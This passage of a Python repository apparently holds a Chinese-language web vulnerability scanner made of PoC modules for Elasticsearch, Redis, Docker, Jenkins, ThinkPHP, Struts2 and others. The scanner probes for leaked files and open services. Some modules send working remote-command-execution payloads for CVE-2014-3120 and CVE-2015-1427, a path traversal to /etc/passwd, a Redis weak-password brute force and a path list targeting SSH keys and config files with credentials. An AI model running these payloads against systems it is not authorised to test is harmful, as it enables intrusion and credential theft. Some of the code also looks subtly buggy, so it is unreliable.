25 | r = requests.get(url, headers = headers, timeout=10, allow_redirects=False)
26 | if r.headers['Access-Control-Allow-Origin'] == orgin and r.headers['Access-Control-Allow-Credentials'] == "true":
27 | print(Vcolors.RED + "存在CORS跨域资源共享漏洞" + Vcolors.ENDC)
28 |
29 | else:
30 | print(Vcolors.OKGREEN + "不存在CORS跨域资源共享漏洞" + Vcolors.ENDC)
31 | except Exception:
32 | print(Vcolors.OKGREEN + "不存在CORS跨域资源共享漏洞" + Vcolors.ENDC)
33 |
--------------------------------------------------------------------------------
/poc/dirburte.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : dirburte.py
4 | @Time : 2019/07/07 00:19:28
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | from socket import *
15 | import threading
16 |
17 | threads = []
18 |
19 | def dirburte1(url2,path):
20 | s = url2 + path
21 | try:
22 | r = requests.get(s)
23 | if r.status_code == 200 or r.status_code == 302:
24 | print(Vcolors.RED + "发现风险目录/文件,地址为:" + s + Vcolors.ENDC)
25 | else:
26 | pass
27 | except:
28 | print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
29 | pass
30 |
31 | def dirburte(ip):
32 | print('\n')
33 | print(Vcolors.OKBLUE + "正在对目标url进行目录/文件泄露探测~~" + Vcolors.ENDC)
34 | print(Vcolors.YELLOW + "检测中,请稍候~~" + Vcolors.ENDC)
35 | dirl(ip)
36 |
37 | def dirl(ip):
38 | setdefaulttimeout(1)
39 | #扫描1-1024端口
40 | exp = ["/robots.txt", "/README.md", "/crossdomain.xml",
41 | "/.hg","/CVS/Root", "/CVS/Entries", "/.idea/workspace.xml",
42 | "/nginx_status", "/.mysql_history", "/login/", "/phpMyAdmin",
43 | "/pma/", "/pmd/", "/SiteServer", "/admin/", "/Admin/", "/manage",
44 | "/manager/", "/manage/html", "/resin-admin", "/resin-doc",
45 | "/axis2-admin", "/admin-console", "/system", "/wp-admin",
46 | "/uc_server", "/debug", "/Conf", "/webmail", "/service",
47 | "/memadmin", "/owa", "/harbor", "/master", "/root", "/xmlrpc.php",
48 | "/phpinfo.php", "/zabbix", "/api", "/backup", "/inc",
49 | "/web.config", "/httpd.conf", "/local.conf", "/sitemap.xml",
50 | "/app.config", "/.bash_history", "/.rediscli_history", "/.bashrc",
51 | "/.history", "/nohup.out", "/.mysql_history", "/server-status",
52 | "/solr/", "/examples/","/examples/servlets/servlet/SessionExample", "/manager/html",
53 | "/login.do", "/config/database.yml", "/database.yml", "/db.conf",
54 | "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/",
55 | "/jenkins/script", "/memadmin/index.php", "/pma/index.php",
56 | "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore",
57 | "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa",
58 | "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp",
59 | "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp",
60 | "/.config.php.swp", "/config/.config.php.swp","/html.rar",
61 | "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini","/pwd.rar",
62 | "/sftp-config.json", "/WEB-INF/web.xml","/www.rar","/www.zip","/www.tar.gz",
63 | "/WEB-INF/web.xml.bak", "/WEB-INF/config.xml",
64 | "/WEB-INF/struts-config.xml", "/server.xml","/1.rar","/1.zip","/modules/ssl.zip","/www.war","/shell.war","/1.war",
65 | "/config/database.yml", "/WEB-INF/database.properties",
66 | "/WEB-INF/log4j.properties", "/WEB-INF/config/dbconfig",
67 | "/fckeditor/_samples/default.html", "/ckeditor/samples/",
68 | "/ueditor/ueditor.config.js",
69 | "/javax.faces.resource...%2fWEB-INF/web.xml.jsf", "/wp-config.php",
70 | "/configuration.php", "/sites/default/settings.php", "/config.php",
71 | "/config.inc.php", "/data/config.php", "/data/config.inc.php",
72 | "/data/common.inc.php", "/include/config.inc.php",
73 | "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr",
74 | "/SearchPublicRegistries.jsp", "/.bash_logout",
75 | "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile",
76 | "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak",
77 | "/WEB-INF/classes/struts.xml", "/package.rar",
78 | "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php",
79 | "/zabbix/", "/script", "/editor/ckeditor/samples/", "/upfile.php",
80 | "/conf.tar.gz",
81 | "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml",
82 | "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh",
83 | "/database.sql.gz", "/o.tar.gz", "/upload.sh",
84 | "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh",
85 | "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties",
86 | "/WEB-INF/spring.xml", "/.htaccess",
87 | "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp",
88 | "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml",
89 | "/config/config.php", "/.idea/modules.xml",
90 | "/WEB-INF/spring-cfg/applicationContext.xml", "/test2.txt",
91 | "/WEB-INF/classes/applicationContext.xml",
92 | "/WEB-INF/conf/database_config.properties",
93 | "/WEB-INF/classes/rabbitmq.xml",
94 | "/ckeditor/samples/sample_posteddata.php", "/proxy.pac",
95 | "/sql.php", "/test2.php", "/build.tar.gz",
96 | "/WEB-INF/classes/config/applicationContext.xml",
97 | "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php",
98 | "/WEB-INF/web.properties", "/readme.html", "/key"]
99 | for p in exp:
100 | t = threading.Thread(target=dirburte1,args=(ip,p))
101 | threads.append(t)
102 | t.start()
103 |
104 | for t in threads:
105 | t.join()
106 |
--------------------------------------------------------------------------------
/poc/dockerunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : docker_unauthorized_access.py
4 | @Time : 2019/08/03 23:03:54
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | from lib import *
14 |
15 |
16 | def dockercheck(ip):
17 | print('\n')
18 | print(Vcolors.OKBLUE + "正在对目标url进行Docker未授权访问漏洞探测~~" + Vcolors.ENDC)
19 | socket.setdefaulttimeout(2)
20 | try:
21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22 | s.connect((ip, 2375))
23 | payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (ip, 2375)
24 | s.send(payload.encode())
25 | recv = s.recv(1024)
26 | if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
27 | print(Vcolors.RED + "存在Docker未授权访问漏洞"+ Vcolors.ENDC)
28 | else:
29 | print(Vcolors.OKGREEN + "不存在Docker未授权访问漏洞" + Vcolors.ENDC)
30 | except:
31 | print(Vcolors.OKGREEN + "不存在Docker未授权访问漏洞" + Vcolors.ENDC)
32 |
--------------------------------------------------------------------------------
/poc/dsstore.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : dsstore.py
4 | @Time : 2019/07/06 00:52:56
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import re
13 | from lib import *
14 |
15 |
16 | def dsCheck(url2):
17 | print('\n')
18 | print(Vcolors.OKBLUE + "正在对目标url进行.DS_Store漏洞探测~~" + Vcolors.ENDC)
19 | try:
20 | default_url="/.DS_Store"
21 | ipList = []
22 | strList = []
23 | for i in url2:
24 | strList.append(i)
25 | a = strList.count('/')
26 | for i in range(a-2):
27 | url2 = url2[:url2.rfind("/")]
28 | ipList.append(url2+default_url)
29 | for url in ipList:
30 | r = requests.get(url)
31 | if r.status_code==200:
32 | print(Vcolors.RED + "存在.DS_Store泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
33 | else:
34 | print(Vcolors.OKGREEN + "不存在.DS_Store泄露漏洞" + Vcolors.ENDC)
35 | except:
36 | print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/elasticSearch.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : elasticSearch.py
4 | @Time : 2019/07/19 17:29:45
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import json
13 | from lib import *
14 |
15 | def dirTravlesal(url): #ElasticSearch目录遍历漏洞
16 | try:
17 | req = requests.get(url+':9200/_plugin/head/../../../../../../../../../etc/passwd', timeout=5)
18 | if req.status_code == 200:
19 | print(Vcolors.RED + "存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)
20 | else:
21 | print(Vcolors.OKGREEN + "不存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)
22 | except:
23 | print(Vcolors.OKGREEN + "不存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)
24 |
25 | def remoteCodeExe(url): #CVE-2014-3120 远程命令执行
26 | try:
27 | headers = {'Content-Type':'application/x-www-form-urlencoded'}
28 | req = requests.post(url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""", timeout=5) # es 中至少存在一条数据, so, 创建
29 | # print(req.text) # {"_index":"website","_type":"blog","_id":"gyLnhuVzSBGc9sN1g4v8iQ","_version":1,"created":true}
30 | data ={
31 | "size": 1,
32 | "query": {
33 | "filtered": {
34 | "query": {
35 | "match_all": {
36 | }
37 | }
38 | }
39 | },
40 | "script_fields": {
41 | "command": {
42 | "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
43 | }
44 | }
45 | }
46 |
47 | req = requests.post(url+':9200/_search?pretty', headers=headers, data=json.dumps(data), timeout=5)
48 | if req.status_code == 200:
49 | print(Vcolors.RED + "存在CVE-2014-3120 ElasticSearch远程命令执行")
50 | else:
51 | print(Vcolors.OKGREEN + "不存在CVE-2014-3120 ElasticSearch远程命令执行")
52 | except:
53 | print(Vcolors.OKGREEN + "不存在CVE-2014-3120 ElasticSearch远程命令执行")
54 |
55 | def remoteCodeExe1(url): #CVE-2015-1427
56 | try:
57 | headers = {'Content-Type':'application/x-www-form-urlencoded'}
58 | req1 = requests.post(url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""", timeout=5) # es 中至少存在一条数据, so, 创建
59 |
60 | data = {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
61 | req = requests.post(url+':9200/_search?pretty', headers=headers, data=json.dumps(data), timeout=5)
62 |
63 | if req.status_code == 200:
64 | print(Vcolors.RED + "存在CVE-2015-1427 ElasticSearch远程命令执行" + Vcolors.ENDC)
65 | else:
66 | print(Vcolors.OKGREEN + "不存在CVE-2015-1427 ElasticSearch远程命令执行" + Vcolors.ENDC)
67 | except:
68 | print(Vcolors.OKGREEN + "不存在CVE-2015-1427 ElasticSearch远程命令执行")
69 |
70 | def esUnauto(url):
71 | try:
72 | response = requests.get(url+":9200/_cat",timeout =5)
73 | if "/_cat/master" in response.content:
74 | print(Vcolors.RED + "存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)
75 | else:
76 | print(Vcolors.OKGREEN + "不存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)
77 | except:
78 | print(Vcolors.OKGREEN + "不存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)
79 | def esCheck(url):
80 | print('\n')
81 | print(Vcolors.OKBLUE + "正在对目标url进行ElasticSearch漏洞探测~~" + Vcolors.ENDC)
82 | dirTravlesal(url)
83 | remoteCodeExe(url)
84 | remoteCodeExe1(url)
85 | esUnauto(url)
--------------------------------------------------------------------------------
/poc/esunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : esunauto.py
4 | @Time : 2019/07/15 11:00:45
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | from lib import *
13 |
14 | def elasticsearch(ip):
15 | print('\n')
16 | print(Vcolors.OKBLUE + "正在对目标url进行Elasticsearch未授权漏洞探测~~" + Vcolors.ENDC)
17 | try:
18 | port=9200
19 | url = ip+str(port)+"/_cat"
20 | response = requests.get(url,timeout=5)
21 | if "/_cat/master" in response.content:
22 | print(Vcolors.RED + "存在Elasticsearch未授权漏洞" + Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN + "不存在Elasticsearch未授权漏洞" + Vcolors.ENDC)
25 | except:
26 | print(Vcolors.OKGREEN + "不存在Elasticsearch未授权漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/git.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : git.py
4 | @Time : 2019/07/06 00:43:23
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | import re
14 | from lib import *
15 |
16 |
17 | def gitCheck(url2):
18 | print('\n')
19 | print(Vcolors.OKBLUE + "正在对目标url进行.git漏洞探测~~" + Vcolors.ENDC)
20 | try:
21 | default_url="/.git"
22 | ipList = []
23 | strList = []
24 | for i in url2:
25 | strList.append(i)
26 | a = strList.count('/')
27 | for i in range(a-2):
28 | url2 = url2[:url2.rfind("/")]
29 | ipList.append(url2+default_url)
30 | for url in ipList:
31 | r = requests.get(url)
32 | if r.status_code!=200:
33 | print(Vcolors.OKGREEN + "不存在.git泄露漏洞" + Vcolors.ENDC)
34 | else:
35 | print(Vcolors.RED + "存在.git泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
36 | except:
37 | print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/hostinject.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : hostinject.py
4 | @Time : 2019/07/07 14:48:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import sys
13 | import re
14 | from lib import *
15 | # import ssl
16 |
17 | # ssl._create_default_https_context = ssl._create_unverified_context
18 |
19 | def hostinject(url):
20 | try:
21 | print('\n')
22 | print(Vcolors.OKBLUE + "正在对目标url进行HOST主机头注入漏洞探测~~" + Vcolors.ENDC)
23 | headers={'Host' : 'www.je2setest.com'}
24 | headers1={'Host' : 'www.je2setest.com%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo'}
25 | try:
26 | req = requests.get(url, headers = headers, timeout = 5)
27 | resp = str(req.headers) + str(req.text)
28 | except:
29 | req1 = requests.get(url, headers = headers1, timeout = 5)
30 | resp =str(req1.headers) + str(req1.text)
31 | if 'www.je2setest.com' in resp:
32 | print(Vcolors.RED + "存在HOST头攻击漏洞~~" + Vcolors.ENDC)
33 | elif '12345/foo' in resp :
34 | print(Vcolors.RED + "存在HOST主机头注入漏洞~~" + Vcolors.ENDC)
35 | else:
36 | print(Vcolors.OKGREEN + "不存在HOST主机头注入漏洞~~" + Vcolors.ENDC)
37 | except:
38 | pass
--------------------------------------------------------------------------------
/poc/httpOptions.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : httpOptions.py
4 | @Time : 2019/07/06 19:45:26
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 |
15 | def options(url):
16 | try:
17 | print('\n')
18 | print(Vcolors.OKBLUE + "正在对目标url进行不安全的HTTP请求探测~~" + Vcolors.ENDC)
19 | r = requests.options(url)
20 | s = r.headers['allow']
21 | if 'OPTIONS' in s:
22 | print(Vcolors.RED + "目标URL开启了OPTIONS请求~~" + Vcolors.ENDC)
23 | elif 'PUT' in s:
24 | print(Vcolors.RED + "目标URL开启了PUT请求~~" + Vcolors.ENDC)
25 | elif 'TRACE' in s:
26 | print(Vcolors.RED + "目标URL开启了TRACE请求~~" + Vcolors.ENDC)
27 | else:
28 | print(Vcolors.OKGREEN + "目标URL未开启不安全的HTTP请求~~" + Vcolors.ENDC)
29 | except:
30 | print(Vcolors.OKGREEN + "目标URL的HTTP请求不明~~" + Vcolors.ENDC)
31 |
--------------------------------------------------------------------------------
/poc/httpsys.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : http.sys.py
4 | @Time : 2019/07/06 23:22:19
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | from fake_useragent import UserAgent
13 | import requests
14 | import re
15 | import sys
16 |
17 | def httpsys(domain):
18 | try:
19 | print('\n')
20 | print(Vcolors.OKBLUE + "正在对目标url进行HTTP.sys远程命令执行漏洞探测~~" + Vcolors.ENDC)
21 | ua = UserAgent(verify_ssl=False)
22 | headers = {'User-Agent':ua.random}
23 | req = requests.get(str(domain),Timeout = 5)
24 | vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
25 | req = requests.get(str(domain), headers = headers, params=vuln_buffer,timeout = 5)
26 | if req.status_code == 416 :
27 | print(Vcolors.RED + "存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
28 | else:
29 | print(Vcolors.OKGREEN + "不存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
30 | except :
31 | print(Vcolors.OKGREEN + "不存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
32 |
--------------------------------------------------------------------------------
/poc/jenkinsunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : jenkinsunauto.py
4 | @Time : 2019/08/03 22:55:20
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import urllib3
15 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16 |
17 | def jenkins(url):
18 | print('\n')
19 | print(Vcolors.OKBLUE + "正在对目标url进行Jenkins未授权漏洞探测~~" + Vcolors.ENDC)
20 | try:
21 | payload = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
22 | r = requests.get(url + payload, timeout=5, verify=False)
23 | if 'java.lang.NullPointerException' in r.text:
24 | print(Vcolors.RED + "存在Jenkins未授权漏洞" + Vcolors.ENDC)
25 | else:
26 | print(Vcolors.OKGREEN + "不存在Jenkins未授权漏洞" + Vcolors.ENDC)
27 | except:
28 | print(Vcolors.OKGREEN + "不存在Jenkins未授权漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/portscan.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : portscan.py
4 | @Time : 2019/07/07 01:14:29
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from socket import *
12 | import threading
13 | from lib import *
14 |
15 | threads = []
16 |
17 | #端口扫描函数
18 | def portScanner(host,port):
19 | try:
20 | port = int(port)
21 | s = socket(AF_INET,SOCK_STREAM)
22 | s.settimeout(1)
23 | result = s.connect((host,port))
24 | if result:
25 | pass
26 | else:
27 | print(Vcolors.RED + "发现开放端口,端口为:"+str(port) + Vcolors.ENDC)
28 | s.close()
29 | except :
30 | pass
31 |
32 |
33 | def portScan(ip):
34 | print('\n')
35 | print(Vcolors.OKBLUE + "正在对目标常用端口探测~~" + Vcolors.ENDC)
36 | print(Vcolors.YELLOW + "检测中,请稍候~~" + Vcolors.ENDC)
37 | portll(ip)
38 |
39 | def portll(ip):
40 | setdefaulttimeout(1)
41 | #扫描1-1024端口
42 | portList = ["21","22","23","80","161","389","443","445","512","513","514","873","1025","111","1433","1521","5560","7778","2601","2604","3128","3306","3312","3311","3389","4440","5432","5900","5984","6082","6379","7001","7002","7778","8000","8001","8080","8089","8090","9090","8083","8649","8888","9200","9300","10000","11211","27017","27018","28017","50000","50070","50030","33891"]
43 | # portList = ["80","443"]
44 | for p in portList:
45 | p= int(p)
46 | t = threading.Thread(target=portScanner,args=(ip,p))
47 | threads.append(t)
48 | t.start()
49 |
50 | for t in threads:
51 | t.join()
52 |
--------------------------------------------------------------------------------
/poc/redis.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : redis.py
4 | @Time : 2019/07/06 21:22:47
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | import sys
14 | from lib import *
15 |
16 | PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
17 |
18 | def redisCheck(ip):
19 | try:
20 | print('\n')
21 | print(Vcolors.OKBLUE + "正在对目标url进行Redis未授权访问漏洞探测~~" + Vcolors.ENDC)
22 | socket.setdefaulttimeout(4)
23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | port = '6379'
25 | s.connect((ip, int(port)))
26 | exp = b'*1\r\n$4\r\ninfo\r\n'
27 | s.send(exp)
28 | result = s.recv(1024)
29 | if b"redis_version" in result:
30 | print(Vcolors.RED + "存在Redis未授权访问漏洞" + Vcolors.ENDC)
31 | elif b"Authentication" in result:
32 | for pass_ in PASSWORD_DIC:
33 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
34 | s.connect((ip, int(port)))
35 | s.send("AUTH %s\r\n" %(pass_))
36 | result = s.recv(1024)
37 | if '+OK' in result:
38 | print(Vcolors.YELLOW +"存在弱口令,密码:%s" % (pass_) + Vcolors.ENDC)
39 | else:
40 | print(Vcolors.OKGREEN + "不存在Redis未授权访问漏洞" + Vcolors.ENDC)
41 |
42 | except:
43 | print(Vcolors.OKGREEN + "不存在Redis未授权访问漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/rsyncunauth.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : rsyncunauth.py
4 | @Time : 2019/08/03 23:19:38
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | import socket
13 |
14 | timeout = 2
15 |
16 |
17 | def rsyncheck(ip):
18 | print('\n')
19 | print(Vcolors.OKBLUE + "正在对目标url进行Rsync未授权访问漏洞探测~~" + Vcolors.ENDC)
20 | try:
21 | payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a"
22 | socket.setdefaulttimeout(timeout)
23 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | server_address = (ip, 873)
25 | sock.connect(server_address)
26 | sock.sendall(payload)
27 | initinfo = sock.recv(400)
28 | if "RSYNCD" in initinfo:
29 | sock.sendall(b"\x0a")
30 | modulelist = sock.recv(200)
31 | sock.close()
32 | if len(modulelist) > 0:
33 | print(Vcolors.RED + "存在Rsync未授权访问漏洞" + Vcolors.ENDC)
34 | else:
35 | print(Vcolors.OKGREEN + "不存在Rsync未授权访问漏洞" + Vcolors.ENDC)
36 | except:
37 | print(Vcolors.OKGREEN + "不存在Rsync未授权访问漏洞" + Vcolors.ENDC)
38 |
--------------------------------------------------------------------------------
/poc/solrunautho.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : solrunautho.py
4 | @Time : 2019/08/03 23:12:13
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 |
10 | Apache Solr 未授权访问PoC
11 | '''
12 | from lib import *
13 | import requests
14 | import urllib3
15 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16 |
17 |
18 | def apachesolr(url):
19 | print('\n')
20 | print(Vcolors.OKBLUE + "正在对目标url进行Apache Solr 未授权访问漏洞探测~~" + Vcolors.ENDC)
21 | try:
22 | url = url + '/solr/'
23 | g = requests.get(url, timeout=5, verify=False)
24 | if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
25 | print(Vcolors.RED + "存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)
26 | else:
27 | print(Vcolors.OKGREEN + "不存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)
28 | except :
29 | print(Vcolors.OKGREEN + "不存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)
30 |
--------------------------------------------------------------------------------
/poc/struts2.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : struts2.py
4 | @Time : 2019/08/03 22:22:16
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | from app2.s2_006 import s2_006
13 | from app2.s2_009 import s2_009
14 | from app2.s2_013 import s2_013
15 | from app2.s2_016 import s2_016
16 | from app2.s2_016_2 import s2_016_2
17 | from app2.s2_019 import s2_019
18 | from app2.s2_032 import s2_032
19 | from app2.s2_045 import s2_045
20 | from app2.s2_052 import s2_052
21 | from app2.s2_053 import s2_053
22 | from app2.s2_057 import s2_057
23 | from app2.s2_dev import s2_dev
24 |
25 | def StrutsCheck(url):
26 | print('\n')
27 | print(Vcolors.OKBLUE + "正在对目标url进行Struts漏洞探测~~" + Vcolors.ENDC)
28 | s2_006(url)
29 | s2_009(url)
30 | s2_013(url)
31 | s2_016(url)
32 | s2_016_2(url)
33 | s2_019(url)
34 | s2_032(url)
35 | s2_045(url)
36 | s2_052(url)
37 | s2_053(url)
38 | s2_057(url)
39 | s2_dev(url)
--------------------------------------------------------------------------------
/poc/svn.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : svn.py
4 | @Time : 2019/07/05 16:59:36
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import re
13 | from lib import *
14 |
15 |
16 | def svnCheck(url2):
17 | try:
18 | print('\n')
19 | print(Vcolors.OKBLUE + "正在对目标url进行.SVN漏洞探测~~" + Vcolors.ENDC)
20 | default_url="/.svn/././././././././entries"
21 | ipList = []
22 | strList = []
23 | for i in url2:
24 | strList.append(i)
25 | a = strList.count('/')
26 | for i in range(a-2):
27 | url2 = url2[:url2.rfind("/")]
28 | ipList.append(url2+default_url)
29 | for url in ipList:
30 | r = requests.get(url,timeout = 3)
31 | print(r.status_code)
32 | if r.status_code!=200:
33 | print(Vcolors.OKGREEN + "不存在.SVN泄露漏洞" + Vcolors.ENDC)
34 | else:
35 | print(Vcolors.RED + "存在.SVN泄露漏洞,漏洞地址为:"+ url + Vcolors.ENDC)
36 | except:
37 | print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/thinkphprce.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : thinkphprce.py
4 | @Time : 2019/07/06 19:30:01
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 |
15 | def thinkphp(target):
16 | try:
17 | print('\n')
18 | print(Vcolors.OKBLUE + "正在对目标url进行ThinkPHP命令执行漏洞探测~~" + Vcolors.ENDC)
19 | url = target + "/index.php/module/aciton/param1/${@phpinfo()}"
20 | r = requests.get(url, timeout=5)
21 | if r.status_code == 200 and "phpinfo()" in r.text:
22 | print(Vcolors.RED +"存在ThinkPHP命令执行漏洞" + Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN +"不存在ThinkPHP命令执行漏洞" + Vcolors.ENDC)
25 | except:
26 | print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/tomcatexample.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : tomcatexample.py
4 | @Time : 2019/07/06 23:51:40
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | from lib import *
13 |
14 |
15 | def tomcatCheck(url2):
16 | print('\n')
17 | print(Vcolors.OKBLUE + "正在对目标url进行Apache样例文件泄露探测~~" + Vcolors.ENDC)
18 | exp = ['/examples/servlets/servlet/CookieExampleh', '/examples']
19 | payload = []
20 | for i in exp:
21 | s = url2 + i
22 | payload.append(s)
23 |
24 | for url in payload:
25 | r = requests.get(url)
26 | if r.status_code==200:
